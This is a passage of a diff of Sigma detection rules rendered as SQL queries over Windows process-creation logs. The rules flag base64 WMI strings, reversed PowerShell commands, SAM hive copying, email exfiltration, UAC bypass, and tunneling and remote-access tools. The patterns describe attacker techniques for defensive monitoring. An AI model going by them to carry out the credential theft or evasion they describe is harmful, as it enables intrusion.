OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", - "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", - "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", + "title": "Execute Code with Pester.bat as Parent", + "id": "18988e1b-9087-4f8a-82fe-0414dce49878", + "status": "experimental", + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1216" ], "falsepositives": [ - "Custom applications use renamed binaries adding slight change to binary name. 
Typically this is easy to spot and add to whitelist", - "PsExec installed via Windows Store doesn't contain original filename field (False negative)" + "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%\\\\WindowsPowerShell\\\\Modules\\\\Pester\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%{ Invoke-Pester -EnableExit ;%' ESCAPE '\\' OR ParentCommandLine LIKE '%{ Get-Help \"%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" + "filename": "proc_creation_win_lolbin_pester.yml" }, { - "title": "Explorer NOUACCHECK Flag", - "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", + "title": "Execution in Webserver Root Folder", + "id": "35efb964-e6a5-47ad-bbcd-19661854018d", "status": "test", - "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" + "Various applications", + "Tools that include ping or nslookup command invocations" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR 
ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wwwroot\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmpub\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\htdocs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%bin\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tools\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SMSComponent\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_nouaccheck.yml" + "filename": "proc_creation_win_susp_execution_path_webserver.yml" }, { - "title": "New Process Created Via Wmic.EXE", - "id": "526be59f-a573-4eea-b5f7-f0973207634d", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", "status": "test", - "description": "Detects new process creation using WMIC via the \"process call create\" flag", - "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. 
This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1047", - "car.2016-03-002" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE 
'%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_process_creation.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "Winrar Compressing Dump Files", - "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", "status": "experimental", - "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.exfiltration" ], "falsepositives": [ - "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_winrar_dmp.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "Remote Access Tool - AnyDesk Silent Installation", - "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "title": "Network Reconnaissance Activity", + "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", - "author": "Ján Trenčanský", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate deployment of AnyDesk" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Always Install Elevated MSI Spawned Cmd And Powershell", - "id": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "title": "MSExchange Transport Agent Installation", + "id": "83809e84-4475-4b69-bc3e-4aad8568612f", "status": "test", - "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", - "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "description": "Detects the Installation of a Exchange Transport 
Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%msi%' ESCAPE '\\' AND ParentProcessName LIKE '%tmp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml" + "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" }, { - "title": "Replace.exe Usage", - "id": "9292293b-8496-4715-9db6-37028dcda4b3", - "status": "experimental", - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "author": "frack113", + "title": "Suspicious Cabinet File Expansion", + "id": "9f107a84-532c-41af-b005-8d12a607639f", + "status": "test", + "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_replace.yml" + "filename": "proc_creation_win_expand_cabinet_files.yml" }, { - "title": "Cmd.EXE Missing Space Characters Execution Anomaly", - "id": "a16980c2-0c56-4de0-9a79-17971979efdd", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe/c%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/k%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/r%' ESCAPE '\\' OR CommandLine LIKE '%\\\\cmd/r%' ESCAPE '\\' OR CommandLine LIKE '%\"cmd/r%' ESCAPE 
'\\') OR (CommandLine LIKE '%/cwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/cpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/cschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/cbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/ccertutil%' ESCAPE '\\' OR CommandLine LIKE '%/kwhoami%' ESCAPE '\\' OR CommandLine LIKE '%/kpowershell%' ESCAPE '\\' OR CommandLine LIKE '%/kschtasks%' ESCAPE '\\' OR CommandLine LIKE '%/kbitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%/kcertutil%' ESCAPE '\\') OR (CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\')) OR (CommandLine LIKE '%AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\resources\\\\app\\\\node\\_modules%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe/c .' ESCAPE '\\' OR CommandLine = 'cmd.exe /c')))" - ], - "filename": "proc_creation_win_cmd_no_space_execution.yml" - }, - { - "title": "PowerShell SAM Copy", - "id": "1af57a4b-460a-4738-9034-db68b880c665", - "status": "test", - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth 
(Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "attack.command_and_control", + "attack.t1090" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" - }, - { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE 
'\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", + "id": "536e2947-3729-478c-9903-745aaffe60d2", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' 
